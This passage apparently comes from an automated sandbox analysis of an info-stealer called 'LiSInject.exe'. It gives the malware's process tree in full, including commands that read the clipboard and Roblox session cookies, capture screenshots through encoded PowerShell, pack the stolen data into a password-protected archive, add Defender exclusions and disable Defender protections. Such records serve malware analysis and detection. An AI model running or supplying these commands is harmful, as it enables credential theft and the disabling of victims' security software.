      Clipboard Data
      PID:3620
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:3860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1452
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5064
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3868
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:1940
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:4092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:1104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2372
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u1f3maaf\u1f3maaf.cmdline"
        6⤵
        
        PID:3164
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE00.tmp" "c:\Users\Admin\AppData\Local\Temp\u1f3maaf\CSCC1412FF9CC0B49859848FD64616B5350.TMP"
        7⤵
        
        PID:560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1072
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4244
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3100
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1640
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:708
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:3588
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:1072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42682\rar.exe a -r -hp"teamgc" "C:\Users\Admin\AppData\Local\Temp\WYWnn.zip" *"
      4⤵
      PID:3336
    - - C:\Users\Admin\AppData\Local\Temp\_MEI42682\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI42682\rar.exe a -r -hp"teamgc" "C:\Users\Admin\AppData\Local\Temp\WYWnn.zip" *
        5⤵
        Executes dropped EXE
        
        PID:2416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3756
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:2592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:3860
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:3584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3620
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:2008
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5060
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:1656
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1956
- C:\Users\Admin\AppData\Local\Temp\7zOC6B78587\LiSInject.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC6B78587\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:564
- - C:\Users\Admin\AppData\Local\Temp\7zOC6B78587\LiSInject.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC6B78587\LiSInject.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1932
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zOC6B94808\version.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2372
- C:\Windows\notepad.exe
  "C:\Windows\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\7zOC6BFB458\.pdata"
  2⤵
  PID:652
- C:\Users\Admin\AppData\Local\Temp\7zOC6BBD8C8\LiSInject.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOC6BBD8C8\LiSInject.exe"
  2⤵
  - Executes dropped EXE
  PID:4140
- - C:\Users\Admin\AppData\Local\Temp\7zOC6BBD8C8\LiSInject.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOC6BBD8C8\LiSInject.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC6BBD8C8\LiSInject.exe'"
      4⤵
      PID:3512
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOC6BBD8C8\LiSInject.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3480
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5048
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:2408
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:1452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:1180
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:4448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1588
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:3252
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‏.scr'"
      4⤵
      PID:2144
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ ‏.scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:1680
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2700
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:2104
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:1164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2488
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:1140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:1648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3836
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5104
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:4540
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 